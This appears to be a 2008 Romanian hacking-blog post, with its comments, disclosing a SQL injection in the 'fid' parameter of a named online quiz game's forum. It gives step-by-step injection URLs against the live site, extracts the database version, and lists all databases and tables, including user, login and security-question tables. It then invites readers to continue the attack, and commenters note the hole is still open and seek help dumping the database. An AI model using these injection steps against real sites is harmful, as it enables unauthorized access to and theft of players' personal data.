Loading....
Loading....

    Posted by unu in English News

    Posted on November 24th, 2008

    Da…again. Cu putin timp in urma am descoperit parametrul companyid= vulnerabil. Atunci n-am facut public sintaxa pentru extragerea datelor. Adminii au primit mail, si au securizat iesirea. Conquiztador este un joc,ce se joaca in multe tari,pe aceasi platforma. Doar cel din ro avea adaugat parametrul logoclick.php?companyid= . Pentru ce credeti ca era? Pentru a face reclama. Si cui? Desigur,in mare parte,firmelor apartinatoare trustului Pro.
    Dar…si zic dar, pentru ca de data asta parametrul descoperit vulnerabil este global,valabil pentru toate platformele tarilor in care se joaca jocul.(O simpla cautare pe google inurl:”forum_topic.php?fid=” va convinge)Deci parametrul vulnerabil este fid= in sintaxa forum_topic.php?fid= .Totusi pentru a putea exploata vulnerabilitatea avem nevoie de niste cunostinte sql, deoarece rezultatele nu sunt afisate simplu, in text clar.
    Dar un mic exercitiu poate sa faca oricine. Sa luam adresa:http://www.conquiztador.ro/forum_topic.php?fid=5
    si aflam numarul coloanelor: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, adica apare pagina originala. Inlocuim 1 cu 2 si tot asa pana la 5, true… La 6 vom avea http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* eroare, deci avem 5 coloane.
    Acum sa aflam versiunea bazei de date
    select 1,unhex(hex(@@version)),3,4,5 vom avea drept rezultat: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
    Numele bazelor de date sunt:
    [*] cq_ro
    [*] information_schema
    [*] mysql
    [*] mysql_old
    [*] test

    Pe noi ne intereseaza cq_ro. Tabele acestei baze de date sunt:

    aa_unban2
    aa_unban3
    aa_users_chat_save
    aa_users_unban
    ad_download
    addrbook
    adperiods
    advert
    agecategory
    askedgroups
    auct_cycle
    auct_hist
    auct_item
    auct_win
    badmarking_mcq
    badmarking_tq
    badquestion
    balance_change
    balance_users
    banner
    bannerplace
    bannerplace_old
    bctrack
    bctrack_user
    brokenconn
    cachecontrol
    chatmsg
    cities
    clientactionlog
    clinks
    companies
    competition
    competition_games
    compticket
    compuser_codes
    compusers
    connections
    costingames
    countries
    county
    cqusers
    ctrldata
    dbsmlog
    dbsmver
    dbversion
    deletedquestions
    division
    eventlog
    faq
    forum_cat
    forum_msg
    forum_topic
    forum_topic_last
    game
    helppages
    inv_head
    inv_item
    inv_unit
    item_dnloads
    jepgen
    jeprecalc
    lanswers
    layerpopup
    links
    linktrace
    login_log
    loginq
    loginq_temp
    logins
    logo_download
    lqj_answers
    lqj_question
    lqj_targetcity
    lqj_useransw
    mailhead
    mailmsg
    mailmsg_del
    moderatorlog
    moneychange
    moneymovecode
    moneyticket
    monthlystats_temp
    msgfilter
    news
    news_head
    newsletter
    newslettersend
    online
    parameters
    preloader
    preloader_date
    preloader_downcount
    preloaderconf
    qhistory
    qrating
    question
    questioncat
    questionclass
    questionratinglog
    questionrow
    reportx
    rl_competition
    rl_competition_users
    rl_day
    rl_day_prev
    rl_games
    rl_jep
    rl_knl_day
    rl_knl_day_temp
    rl_stu_grp
    rl_vep
    sanyistat
    settings
    smith_repro
    smith_robot
    stu_game
    stu_usergame
    stu_userpoints
    themegroup
    themes
    ticketcodeerror
    tipgroup
    tiphistory
    tipquestion
    tipquestionrow
    tiprating
    tipthemes
    tournament_fgames
    tournament_qresults
    tournament_usergame
    tournament_users
    tournaments
    user_clicks
    useragent
    useransstat
    usergame
    usergame_comp
    userpoints
    userpoints_comp
    users
    users_addr
    users_chat
    users_data
    users_email
    users_extra
    users_flaggers
    users_forum
    users_gold_temp
    users_gold_temp2
    users_locations
    users_names
    users_names_deny
    users_presence
    users_questions
    users_questions_action
    users_questions_admindesc
    users_secureq
    ws_basket
    ws_cat
    ws_deliver
    ws_images
    ws_itemmove
    ws_movetype
    ws_orderhead
    ws_orderitem
    ws_orderstates
    ws_product
    zipcodes

    Mai departe faceti voi.

    Related Posts

    12 Responses to “Conquiztador Hacked Again”

    1. Ce păţesc unii când nu sunt atenţi la SQL injection | Romania, 'prietena ta' Says:

      [...] primit azi următorul link de la Danv. Dacă o să citiţi postarea de pe hackersblog o să vedeţi cât de banală este [...]

    2. unu Says:

      culmea e ca nici acum n-au securizat parametrul, deci e vulnerabil in continuare (degeaba au fost anuntati)

    3. mariusoi Says:

      am incercat sa aflu explicatii de la moderatori si mi-a dat oana aia ban. se comporta ca atunci cand au aparut codurile. cre’ca le e greu sa recunoasca cand gresesc si moderatorii sunt mai inapti decat aia vechi. asa e cand pui femei proaste la conducere

    4. Conquiztador Hacked Again - 2Blog Says:

      [...] Pentru continuare si mai multe informatii cititi articolul intreg pe HackersBlog.org! [...]

    5. anonymous Says:

      Btw, stiti de ce le merge site-ul asa “bine”? De prin Mai parca au introdus sistemul de criptare RSA in conexiunea jocului… la atatea numere prime mi se pare normal sa se blocheze :) … Iar decriptarea mie imi ia cam 2-3 secunde. Stie careva daca mai merge aflarea variabilelor din javascript?

    6. 2fingers Says:

      Din cate am inteles versiunea romaneasca are o criptare mult mai eficienta decat versiunile celorlalte tari si sansele de a trece de aceasta criptare si de a creea un nou cheat s-au micsorat considerabil.

    7. win now Says:

      Diese seite ist genauso interessant wie informativ. Viele Grüße!

    8. tiger poker Says:

      Nice work chief ;-)

    9. login Says:

      Spent some great time in your site, really enjoyed it

    10. tips Says:

      Exstremely lovely site. Very impressed about all the lesson there are to learn and to know how much help is there also. Keep up the great work

    11. Nimeni Altul Says:

      Salut! Nu stiu daca am procedat corect tinand cont ca am postat aici. Sunt nou aici si m-am gandit sa cer putin ajutor (sfat,parere). Am facut un program la conquiztador si un boot de colectare dar nu am rabdare sa stau sa le colectez asta dupa parerea fiindca ar exista si alta cale. As dori sa sustrag toate intrebarile din db dar din cate am incercat eu nu mai este vulnerabila la sqli. Multumesc orice sfat este bine primit. O zi buna

    12. Marius Says:

      @ Nimeni Altul Te ajut si eu cu boot ul de colectare. ID: marius_ionuty

    Leave a Reply

    Studio videochat bucuresti Studio videochat Bucuresti
    Download Muzica Filme
    Studio videochat Iasi videochat Iasi